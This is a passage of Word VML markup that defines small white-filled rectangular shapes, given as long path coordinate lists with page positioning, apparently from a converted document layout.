781,5294,4781,5293,4781,5292,4781,5290,4781,5289,4781,5288,4781,5287,4781,5285,4781,5284,4781,5282,4781,5281,4781,5279,4781,5278,4781,5276,4781,5275,4781,5273,4781,5271,4781,5270,4781,5268,4781,5266,4781,5264,4781,5263,4781,5261,4781,5259,4781,5257,4781,5255,4781,5253,4781,5250,4781,5248,4781,5246,4781,5244,4781,5242,4781,5239,4781,5237,4781,5234,4781,5232,4781,5229,4781,5227,4781,5224,4781,5222,4781,5219,4781,5216,4781,5213,4781,5210,4781,5208,4781,5205,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4781,5202,4780,5202,4780,5202,4780,5202,4780,5202,4780,5202,4779,5202,4779,5202,4779,5202,4778,5202,4778,5202,4778,5202,4777,5202,4777,5202,4776,5202,4776,5202,4775,5202,4775,5202,4774,5202,4774,5202,4773,5202,4772,5202,4772,5202,4771,5202,4770,5202,4769,5202,4769,5202,4768,5202,4767,5202,4766,5202,4765,5202,4764,5202,4762,5202,4761,5202,4760,5202,4759,5202,4758,5202,4756,5202,4755,5202,4753,5202,4752,5202,4750,5202,4749,5202,4747,5202,4745,5202,4744,5202,4742,5202,4740,5202,4738,5202,4736,5202,4734,5202,4732,5202,4729,5202,4727,5202,4725,5202,4723,5202,4720,5202,4718,5202,4715,5202,4712,5202,4710,5202,4707,5202,4704,5202,4701,5202,4698,5202,4695,5202,4692,5202,4688,5202,4685,5202,4682,5202,4678,5202,4675,5202,4671,5202,4667,5202,4664,5202,4660,5202,4656,5202,4652,5202,4647,5202,4643,5202,4639,5202,4635,5202,4630,5202,4625,5202,4621,5202,4616,5202,4611,5202,4606,5202,4601,5202,4596,5202,4591,5202,4585,5202,4580,5202,4574,5202,4569,5202,4563,5202,4557,5202,4551,5202,4545,5202,4539,5202,4533,5202,4526e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:265.500pt;margin-top:225.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5310,4510" coordsize="130,270">
        <v:shape style="position:absolute;left:5310;top:4510;width:130;height:270" coordorigin="5310,4510" coordsize="130,270" path="m5322,4526l5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5323,4526,5323,4526,5323,4526,5323,4526,5323,4526,5323,4526,5323,4526,5324,4526,5324,4526,5324,4526,5324,4526,5324,4526,5325,4526,5325,4526,5325,4526,5326,4526,5326,4526,5326,4526,5327,4526,5327,4526,5327,4526,5328,4526,5328,4526,5329,4526,5329,4526,5330,4526,5330,4526,5331,4526,5331,4526,5332,4526,5332,4526,5333,4526,5334,4526,5334,4526,5335,4526,5336,4526,5336,4526,5337,4526,5338,4526,5339,4526,5339,4526,5340,4526,5341,4526,5342,4526,5343,4526,5344,4526,5345,4526,5346,4526,5347,4526,5348,4526,5349,4526,5351,4526,5352,4526,5353,4526,5354,4526,5355,4526,5357,4526,5358,4526,5360,4526,5361,4526,5362,4526,5364,4526,5365,4526,5367,4526,5369,4526,5370,4526,5372,4526,5374,4526,5375,4526,5377,4526,5379,4526,5381,4526,5383,4526,5385,4526,5387,4526,5389,4526,5391,4526,5393,4526,5395,4526,5397,4526,5400,4526,5402,4526,5404,4526,5407,4526,5409,4526,5411,4526,5414,4526,5417,4526,5419,4526,5422,4526,5424,4526,5427,4526,5430,4526,5433,4526,5436,4526,5439,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4526,5442,4527,5442,4527,5442,4527,5442,4527,5442,4527,5442,4527,5442,4527,5442,4527,5442,4527,5442,4528,5442,4528,5442,4528,5442,4528,5442,4529,5442,4529,5442,4529,5442,4530,5442,4530,5442,4530,5442,4531,5442,4531,5442,4532,5442,4532,5442,4533,5442,4533,5442,4534,5442,4535,5442,4535,5442,4536,5442,4537,5442,4537,5442,4538,5442,4539,5442,4540,5442,4541,5442,4542,5442,4543,5442,4544,5442,4545,5442,4546,5442,4548,5442,4549,5442,4550,5442,4551,5442,4553,5442,4554,5442,4556,5442,4557,5442,4559,5442,4561,5442,4562,5442,4564,5442,4566,5442,4568,5442,4570,5442,4572,5442,4574,5442,4576,5442,4578,5442,4580,5442,4583,5442,4585,5442,4588,5442,4590,5442,4593,5442,4595,5442,4598,5442,4601,5442,4604,5442,4607,5442,4610,5442,4613,5442,4616,5442,4619,5442,4623,5442,4626,5442,4629,5442,4633,5442,4637,5442,4640,5442,4644,5442,4648,5442,4652,5442,4656,5442,4660,5442,4664,5442,4669,5442,4673,5442,4678,5442,4682,5442,4687,5442,4692,5442,4697,5442,4702,5442,4707,5442,4712,5442,4717,5442,4722,5442,4728,5442,4733,5442,4739,5442,4745,5442,4751,5442,4757,5442,4763,5442,4769,5442,4775,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5442,4781,5441,4781,5441,4781,5441,4781,5441,4781,5441,4781,5441,4781,5441,4781,5441,4781,5441,4781,5441,4781,5440,4781,5440,4781,5440,4781,5440,4781,5440,4781,5440,4781,5439,4781,5439,4781,5439,4781,5439,4781,5438,4781,5438,4781,5438,4781,5438,4781,5437,4781,5437,4781,5436,4781,5436,4781,5436,4781,5435,4781,5435,4781,5434,4781,5434,4781,5433,4781,5433,4781,5432,4781,5432,4781,5431,4781,5431,4781,5430,4781,5429,4781,5429,4781,5428,4781,5427,4781,5426,4781,5426,4781,5425,4781,5424,4781,5423,4781,5422,4781,5421,4781,5420,4781,5419,4781,5418,4781,5417,4781,5416,4781,5415,4781,5414,4781,5413,4781,5412,4781,5410,4781,5409,4781,5408,4781,5407,4781,5405,4781,5404,4781,5402,4781,5401,4781,5400,4781,5398,4781,5396,4781,5395,4781,5393,4781,5392,4781,5390,4781,5388,4781,5386,4781,5384,4781,5383,4781,5381,4781,5379,4781,5377,4781,5375,4781,5373,4781,5370,4781,5368,4781,5366,4781,5364,4781,5362,4781,5359,4781,5357,4781,5354,4781,5352,4781,5349,4781,5347,4781,5344,4781,5342,4781,5339,4781,5336,4781,5333,4781,5331,4781,5328,4781,5325,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4781,5322,4780,5322,4780,5322,4780,5322,4780,5322,4780,5322,4779,5322,4779,5322,4779,5322,4778,5322,4778,5322,4778,5322,4777,5322,4777,5322,4776,5322,4776,5322,4775,5322,4775,5322,4774,5322,4774,5322,4773,5322,4772,5322,4772,5322,4771,5322,4770,5322,4769,5322,4769,5322,4768,5322,4767,5322,4766,5322,4765,5322,4764,5322,4762,5322,4761,5322,4760,5322,4759,5322,4758,5322,4756,5322,4755,5322,4753,5322,4752,5322,4750,5322,4749,5322,4747,5322,4745,5322,4744,5322,4742,5322,4740,5322,4738,5322,4736,5322,4734,5322,4732,5322,4729,5322,4727,5322,4725,5322,4723,5322,4720,5322,4718,5322,4715,5322,4712,5322,4710,5322,4707,5322,4704,5322,4701,5322,4698,5322,4695,5322,4692,5322,4688,5322,4685,5322,4682,5322,4678,5322,4675,5322,4671,5322,4667,5322,4664,5322,4660,5322,4656,5322,4652,5322,4647,5322,4643,5322,4639,5322,4635,5322,4630,5322,4625,5322,4621,5322,4616,5322,4611,5322,4606,5322,4601,5322,4596,5322,4591,5322,4585,5322,4580,5322,4574,5322,4569,5322,4563,5322,4557,5322,4551,5322,4545,5322,4539,5322,4533,5322,4526e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:349.500pt;margin-top:225.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6990,4510" coordsize="130,270">
        <v:shape style="position:absolute;left:6990;top:4510;width:130;height:270" coordorigin="6990,4510" coordsize="130,270" path="m7003,4526l7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7003,4526,7004,4526,7004,4526,7004,4526,7004,4526,7004,4526,7004,4526,7004,4526,7005,4526,7005,4526,7005,4526,7005,4526,7006,4526,7006,4526,7006,4526,7006,4526,7007,4526,7007,4526,7007,4526,7008,4526,7008,4526,7009,4526,7009,4526,7009,4526,7010,4526,7010,4526,7011,4526,7011,4526,7012,4526,7013,4526,7013,4526,7014,4526,7014,4526,7015,4526,7016,4526,7016,4526,7017,4526,7018,4526,7019,4526,7020,4526,7020,4526,7021,4526,7022,4526,7023,4526,7024,4526,7025,4526,7026,4526,7027,4526,7028,4526,7029,4526,7030,4526,7031,4526,7033,4526,7034,4526,7035,4526,7036,4526,7038,4526,7039,4526,7040,4526,7042,4526,7043,4526,7045,4526,7046,4526,7048,4526,7049,4526,7051,4526,7053,4526,7054,4526,7056,4526,7058,4526,7060,4526,7062,4526,7064,4526,7066,4526,7068,4526,7070,4526,7072,4526,7074,4526,7076,4526,7078,4526,7080,4526,7083,4526,7085,4526,7087,4526,7090,4526,7092,4526,7095,4526,7097,4526,7100,4526,7103,4526,7105,4526,7108,4526,7111,4526,7114,4526,7117,4526,7120,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4527,7123,4527,7123,4527,7123,4527,7123,4527,7123,4527,7123,4527,7123,4527,7123,4527,7123,4528,7123,4528,7123,4528,7123,4528,7123,4529,7123,4529,7123,4529,7123,4530,7123,4530,7123,4530,7123,4531,7123,4531,7123,4532,7123,4532,7123,4533,7123,4533,7123,4534,7123,4535,7123,4535,7123,4536,7123,4537,7123,4537,7123,4538,7123,4539,7123,4540,7123,4541,7123,4542,7123,4543,7123,4544,7123,4545,7123,4546,7123,4548,7123,4549,7123,4550,7123,4551,7123,4553,7123,4554,7123,4556,7123,4557,7123,4559,7123,4561,7123,4562,7123,4564,7123,4566,7123,4568,7123,4570,7123,4572,7123,4574,7123,4576,7123,4578,7123,4580,7123,4583,7123,4585,7123,4588,7123,4590,7123,4593,7123,4595,7123,4598,7123,4601,7123,4604,7123,4607,7123,4610,7123,4613,7123,4616,7123,4619,7123,4623,7123,4626,7123,4629,7123,4633,7123,4637,7123,4640,7123,4644,7123,4648,7123,4652,7123,4656,7123,4660,7123,4664,7123,4669,7123,4673,7123,4678,7123,4682,7123,4687,7123,4692,7123,4697,7123,4702,7123,4707,7123,4712,7123,4717,7123,4722,7123,4728,7123,4733,7123,4739,7123,4745,7123,4751,7123,4757,7123,4763,7123,4769,7123,4775,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7122,4781,7121,4781,7121,4781,7121,4781,7121,4781,7121,4781,7121,4781,7120,4781,7120,4781,7120,4781,7120,4781,7120,4781,7119,4781,7119,4781,7119,4781,7118,4781,7118,4781,7118,4781,7117,4781,7117,4781,7117,4781,7116,4781,7116,4781,7115,4781,7115,4781,7114,4781,7114,4781,7113,4781,7113,4781,7112,4781,7111,4781,7111,4781,7110,4781,7109,4781,7109,4781,7108,4781,7107,4781,7106,4781,7106,4781,7105,4781,7104,4781,7103,4781,7102,4781,7101,4781,7100,4781,7099,4781,7098,4781,7097,4781,7096,4781,7095,4781,7094,4781,7093,4781,7091,4781,7090,4781,7089,4781,7087,4781,7086,4781,7085,4781,7083,4781,7082,4781,7080,4781,7079,4781,7077,4781,7076,4781,7074,4781,7072,4781,7071,4781,7069,4781,7067,4781,7065,4781,7063,4781,7062,4781,7060,4781,7058,4781,7056,4781,7053,4781,7051,4781,7049,4781,7047,4781,7045,4781,7042,4781,7040,4781,7038,4781,7035,4781,7033,4781,7030,4781,7028,4781,7025,4781,7022,4781,7020,4781,7017,4781,7014,4781,7011,4781,7008,4781,7006,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4781,7003,4780,7003,4780,7003,4780,7003,4780,7003,4780,7003,4779,7003,4779,7003,4779,7003,4778,7003,4778,7003,4778,7003,4777,7003,4777,7003,4776,7003,4776,7003,4775,7003,4775,7003,4774,7003,4774,7003,4773,7003,4772,7003,4772,7003,4771,7003,4770,7003,4769,7003,4769,7003,4768,7003,4767,7003,4766,7003,4765,7003,4764,7003,4762,7003,4761,7003,4760,7003,4759,7003,4758,7003,4756,7003,4755,7003,4753,7003,4752,7003,4750,7003,4749,7003,4747,7003,4745,7003,4744,7003,4742,7003,4740,7003,4738,7003,4736,7003,4734,7003,4732,7003,4729,7003,4727,7003,4725,7003,4723,7003,4720,7003,4718,7003,4715,7003,4712,7003,4710,7003,4707,7003,4704,7003,4701,7003,4698,7003,4695,7003,4692,7003,4688,7003,4685,7003,4682,7003,4678,7003,4675,7003,4671,7003,4667,7003,4664,7003,4660,7003,4656,7003,4652,7003,4647,7003,4643,7003,4639,7003,4635,7003,4630,7003,4625,7003,4621,7003,4616,7003,4611,7003,4606,7003,4601,7003,4596,7003,4591,7003,4585,7003,4580,7003,4574,7003,4569,7003,4563,7003,4557,7003,4551,7003,4545,7003,4539,7003,4533,7003,4526e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:355.500pt;margin-top:225.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7110,4510" coordsize="130,270">
        <v:shape style="position:absolute;left:7110;top:4510;width:130;height:270" coordorigin="7110,4510" coordsize="130,270" path="m7123,4526l7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7123,4526,7124,4526,7124,4526,7124,4526,7124,4526,7124,4526,7124,4526,7125,4526,7125,4526,7125,4526,7125,4526,7125,4526,7126,4526,7126,4526,7126,4526,7126,4526,7127,4526,7127,4526,7127,4526,7128,4526,7128,4526,7129,4526,7129,4526,7130,4526,7130,4526,7130,4526,7131,4526,7131,4526,7132,4526,7133,4526,7133,4526,7134,4526,7134,4526,7135,4526,7136,4526,7136,4526,7137,4526,7138,4526,7139,4526,7140,4526,7140,4526,7141,4526,7142,4526,7143,4526,7144,4526,7145,4526,7146,4526,7147,4526,7148,4526,7149,4526,7150,4526,7151,4526,7153,4526,7154,4526,7155,4526,7156,4526,7158,4526,7159,4526,7160,4526,7162,4526,7163,4526,7165,4526,7166,4526,7168,4526,7170,4526,7171,4526,7173,4526,7175,4526,7176,4526,7178,4526,7180,4526,7182,4526,7184,4526,7186,4526,7188,4526,7190,4526,7192,4526,7194,4526,7196,4526,7198,4526,7200,4526,7203,4526,7205,4526,7207,4526,7210,4526,7212,4526,7215,4526,7217,4526,7220,4526,7223,4526,7225,4526,7228,4526,7231,4526,7234,4526,7237,4526,7240,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4526,7243,4527,7243,4527,7243,4527,7243,4527,7243,4527,7243,4527,7243,4527,7243,4527,7243,4527,7243,4528,7243,4528,7243,4528,7243,4528,7243,4529,7243,4529,7243,4529,7243,4530,7243,4530,7243,4530,7243,4531,7243,4531,7243,4532,7243,4532,7243,4533,7243,4533,7243,4534,7243,4535,7243,4535,7243,4536,7243,4537,7243,4537,7243,4538,7243,4539,7243,4540,7243,4541,7243,4542,7243,4543,7243,4544,7243,4545,7243,4546,7243,4548,7243,4549,7243,4550,7243,4551,7243,4553,7243,4554,7243,4556,7243,4557,7243,4559,7243,4561,7243,4562,7243,4564,7243,4566,7243,4568,7243,4570,7243,4572,7243,4574,7243,4576,7243,4578,7243,4580,7243,4583,7243,4585,7243,4588,7243,4590,7243,4593,7243,4595,7243,4598,7243,4601,7243,4604,7243,4607,7243,4610,7243,4613,7243,4616,7243,4619,7243,4623,7243,4626,7243,4629,7243,4633,7243,4637,7243,4640,7243,4644,7243,4648,7243,4652,7243,4656,7243,4660,7243,4664,7243,4669,7243,4673,7243,4678,7243,4682,7243,4687,7243,4692,7243,4697,7243,4702,7243,4707,7243,4712,7243,4717,7243,4722,7243,4728,7243,4733,7243,4739,7243,4745,7243,4751,7243,4757,7243,4763,7243,4769,7243,4775,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7243,4781,7242,4781,7242,4781,7242,4781,7242,4781,7242,4781,7242,4781,7242,4781,7242,4781,7242,4781,7242,4781,7242,4781,7242,4781,7242,4781,7241,4781,7241,4781,7241,4781,7241,4781,7241,4781,7241,4781,7240,4781,7240,4781,7240,4781,7240,4781,7239,4781,7239,4781,7239,4781,7238,4781,7238,4781,7238,4781,7237,4781,7237,4781,7237,4781,7236,4781,7236,4781,7235,4781,7235,4781,7234,4781,7234,4781,7233,4781,7233,4781,7232,4781,7231,4781,7231,4781,7230,4781,7229,4781,7229,4781,7228,4781,7227,4781,7226,4781,7226,4781,7225,4781,7224,4781,7223,4781,7222,4781,7221,4781,7220,4781,7219,4781,7218,4781,7217,4781,7216,4781,7215,4781,7214,4781,7213,4781,7211,4781,7210,4781,7209,4781,7208,4781,7206,4781,7205,4781,7203,4781,7202,4781,7200,4781,7199,4781,7197,4781,7196,4781,7194,4781,7192,4781,7191,4781,7189,4781,7187,4781,7185,4781,7183,4781,7182,4781,7180,4781,7178,4781,7176,4781,7174,4781,7171,4781,7169,4781,7167,4781,7165,4781,7163,4781,7160,4781,7158,4781,7155,4781,7153,4781,7150,4781,7148,4781,7145,4781,7143,4781,7140,4781,7137,4781,7134,4781,7131,4781,7129,4781,7126,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4781,7123,4780,7123,4780,7123,4780,7123,4780,7123,4780,7123,4779,7123,4779,7123,4779,7123,4778,7123,4778,7123,4778,7123,4777,7123,4777,7123,4776,7123,4776,7123,4775,7123,4775,7123,4774,7123,4774,7123,4773,7123,4772,7123,4772,7123,4771,7123,4770,7123,4769,7123,4769,7123,4768,7123,4767,7123,4766,7123,4765,7123,4764,7123,4762,7123,4761,7123,4760,7123,4759,7123,4758,7123,4756,7123,4755,7123,4753,7123,4752,7123,4750,7123,4749,7123,4747,7123,4745,7123,4744,7123,4742,7123,4740,7123,4738,7123,4736,7123,4734,7123,4732,7123,4729,7123,4727,7123,4725,7123,4723,7123,4720,7123,4718,7123,4715,7123,4712,7123,4710,7123,4707,7123,4704,7123,4701,7123,4698,7123,4695,7123,4692,7123,4688,7123,4685,7123,4682,7123,4678,7123,4675,7123,4671,7123,4667,7123,4664,7123,4660,7123,4656,7123,4652,7123,4647,7123,4643,7123,4639,7123,4635,7123,4630,7123,4625,7123,4621,7123,4616,7123,4611,7123,4606,7123,4601,7123,4596,7123,4591,7123,4585,7123,4580,7123,4574,7123,4569,7123,4563,7123,4557,7123,4551,7123,4545,7123,4539,7123,4533,7123,4526e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:427.500pt;margin-top:225.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8550,4510" coordsize="130,270">
        <v:shape style="position:absolute;left:8550;top:4510;width:130;height:270" coordorigin="8550,4510" coordsize="130,270" path="m8563,4526l8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8563,4526,8564,4526,8564,4526,8564,4526,8564,4526,8564,4526,8564,4526,8564,4526,8564,4526,8564,4526,8564,4526,8564,4526,8564,4526,8565,4526,8565,4526,8565,4526,8565,4526,8565,4526,8565,4526,8566,4526,8566,4526,8566,4526,8566,4526,8567,4526,8567,4526,8567,4526,8568,4526,8568,4526,8568,4526,8569,4526,8569,4526,8569,4526,8570,4526,8570,4526,8571,4526,8571,4526,8572,4526,8572,4526,8573,4526,8573,4526,8574,4526,8575,4526,8575,4526,8576,4526,8577,4526,8577,4526,8578,4526,8579,4526,8579,4526,8580,4526,8581,4526,8582,4526,8583,4526,8584,4526,8585,4526,8586,4526,8587,4526,8588,4526,8589,4526,8590,4526,8591,4526,8592,4526,8593,4526,8595,4526,8596,4526,8597,4526,8598,4526,8600,4526,8601,4526,8603,4526,8604,4526,8606,4526,8607,4526,8609,4526,8610,4526,8612,4526,8614,4526,8615,4526,8617,4526,8619,4526,8621,4526,8622,4526,8624,4526,8626,4526,8628,4526,8630,4526,8632,4526,8635,4526,8637,4526,8639,4526,8641,4526,8643,4526,8646,4526,8648,4526,8651,4526,8653,4526,8656,4526,8658,4526,8661,4526,8663,4526,8666,4526,8669,4526,8672,4526,8675,4526,8677,4526,8680,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4527,8683,4527,8683,4527,8683,4527,8683,4527,8683,4527,8683,4527,8683,4527,8683,4527,8683,4528,8683,4528,8683,4528,8683,4528,8683,4529,8683,4529,8683,4529,8683,4530,8683,4530,8683,4530,8683,4531,8683,4531,8683,4532,8683,4532,8683,4533,8683,4533,8683,4534,8683,4535,8683,4535,8683,4536,8683,4537,8683,4537,8683,4538,8683,4539,8683,4540,8683,4541,8683,4542,8683,4543,8683,4544,8683,4545,8683,4546,8683,4548,8683,4549,8683,4550,8683,4551,8683,4553,8683,4554,8683,4556,8683,4557,8683,4559,8683,4561,8683,4562,8683,4564,8683,4566,8683,4568,8683,4570,8683,4572,8683,4574,8683,4576,8683,4578,8683,4580,8683,4583,8683,4585,8683,4588,8683,4590,8683,4593,8683,4595,8683,4598,8683,4601,8683,4604,8683,4607,8683,4610,8683,4613,8683,4616,8683,4619,8683,4623,8683,4626,8683,4629,8683,4633,8683,4637,8683,4640,8683,4644,8683,4648,8683,4652,8683,4656,8683,4660,8683,4664,8683,4669,8683,4673,8683,4678,8683,4682,8683,4687,8683,4692,8683,4697,8683,4702,8683,4707,8683,4712,8683,4717,8683,4722,8683,4728,8683,4733,8683,4739,8683,4745,8683,4751,8683,4757,8683,4763,8683,4769,8683,4775,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8683,4781,8682,4781,8682,4781,8682,4781,8682,4781,8682,4781,8682,4781,8681,4781,8681,4781,8681,4781,8681,4781,8681,4781,8680,4781,8680,4781,8680,4781,8679,4781,8679,4781,8679,4781,8678,4781,8678,4781,8678,4781,8677,4781,8677,4781,8676,4781,8676,4781,8675,4781,8675,4781,8674,4781,8674,4781,8673,4781,8673,4781,8672,4781,8672,4781,8671,4781,8670,4781,8669,4781,8669,4781,8668,4781,8667,4781,8666,4781,8666,4781,8665,4781,8664,4781,8663,4781,8662,4781,8661,4781,8660,4781,8659,4781,8658,4781,8657,4781,8656,4781,8655,4781,8653,4781,8652,4781,8651,4781,8650,4781,8648,4781,8647,4781,8646,4781,8644,4781,8643,4781,8641,4781,8640,4781,8638,4781,8636,4781,8635,4781,8633,4781,8631,4781,8630,4781,8628,4781,8626,4781,8624,4781,8622,4781,8620,4781,8618,4781,8616,4781,8614,4781,8612,4781,8610,4781,8608,4781,8606,4781,8603,4781,8601,4781,8599,4781,8596,4781,8594,4781,8591,4781,8589,4781,8586,4781,8583,4781,8581,4781,8578,4781,8575,4781,8572,4781,8569,4781,8566,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4781,8563,4780,8563,4780,8563,4780,8563,4780,8563,4780,8563,4779,8563,4779,8563,4779,8563,4778,8563,4778,8563,4778,8563,4777,8563,4777,8563,4776,8563,4776,8563,4775,8563,4775,8563,4774,8563,4774,8563,4773,8563,4772,8563,4772,8563,4771,8563,4770,8563,4769,8563,4769,8563,4768,8563,4767,8563,4766,8563,4765,8563,4764,8563,4762,8563,4761,8563,4760,8563,4759,8563,4758,8563,4756,8563,4755,8563,4753,8563,4752,8563,4750,8563,4749,8563,4747,8563,4745,8563,4744,8563,4742,8563,4740,8563,4738,8563,4736,8563,4734,8563,4732,8563,4729,8563,4727,8563,4725,8563,4723,8563,4720,8563,4718,8563,4715,8563,4712,8563,4710,8563,4707,8563,4704,8563,4701,8563,4698,8563,4695,8563,4692,8563,4688,8563,4685,8563,4682,8563,4678,8563,4675,8563,4671,8563,4667,8563,4664,8563,4660,8563,4656,8563,4652,8563,4647,8563,4643,8563,4639,8563,4635,8563,4630,8563,4625,8563,4621,8563,4616,8563,4611,8563,4606,8563,4601,8563,4596,8563,4591,8563,4585,8563,4580,8563,4574,8563,4569,8563,4563,8563,4557,8563,4551,8563,4545,8563,4539,8563,4533,8563,4526e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:433.500pt;margin-top:225.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8670,4510" coordsize="130,270">
        <v:shape style="position:absolute;left:8670;top:4510;width:130;height:270" coordorigin="8670,4510" coordsize="130,270" path="m8683,4526l8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8683,4526,8684,4526,8684,4526,8684,4526,8684,4526,8684,4526,8684,4526,8684,4526,8684,4526,8684,4526,8684,4526,8684,4526,8684,4526,8684,4526,8685,4526,8685,4526,8685,4526,8685,4526,8685,4526,8685,4526,8686,4526,8686,4526,8686,4526,8686,4526,8687,4526,8687,4526,8687,4526,8688,4526,8688,4526,8688,4526,8689,4526,8689,4526,8689,4526,8690,4526,8690,4526,8691,4526,8691,4526,8692,4526,8692,4526,8693,4526,8693,4526,8694,4526,8695,4526,8695,4526,8696,4526,8697,4526,8697,4526,8698,4526,8699,4526,8700,4526,8700,4526,8701,4526,8702,4526,8703,4526,8704,4526,8705,4526,8706,4526,8707,4526,8708,4526,8709,4526,8710,4526,8711,4526,8712,4526,8713,4526,8715,4526,8716,4526,8717,4526,8719,4526,8720,4526,8721,4526,8723,4526,8724,4526,8726,4526,8727,4526,8729,4526,8730,4526,8732,4526,8734,4526,8735,4526,8737,4526,8739,4526,8741,4526,8743,4526,8744,4526,8746,4526,8748,4526,8750,4526,8753,4526,8755,4526,8757,4526,8759,4526,8761,4526,8764,4526,8766,4526,8768,4526,8771,4526,8773,4526,8776,4526,8778,4526,8781,4526,8783,4526,8786,4526,8789,4526,8792,4526,8795,4526,8797,4526,8800,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4526,8803,4527,8803,4527,8803,4527,8803,4527,8803,4527,8803,4527,8803,4527,8803,4527,8803,4527,8803,4528,8803,4528,8803,4528,8803,4528,8803,4529,8803,4529,8803,4529,8803,4530,8803,4530,8803,4530,8803,4531,8803,4531,8803,4532,8803,4532,8803,4533,8803,4533,8803,4534,8803,4535,8803,4535,8803,4536,8803,4537,8803,4537,8803,4538,8803,4539,8803,4540,8803,4541,8803,4542,8803,4543,8803,4544,8803,4545,8803,4546,8803,4548,8803,4549,8803,4550,8803,4551,8803,4553,8803,4554,8803,4556,8803,4557,8803,4559,8803,4561,8803,4562,8803,4564,8803,4566,8803,4568,8803,4570,8803,4572,8803,4574,8803,4576,8803,4578,8803,4580,8803,4583,8803,4585,8803,4588,8803,4590,8803,4593,8803,4595,8803,4598,8803,4601,8803,4604,8803,4607,8803,4610,8803,4613,8803,4616,8803,4619,8803,4623,8803,4626,8803,4629,8803,4633,8803,4637,8803,4640,8803,4644,8803,4648,8803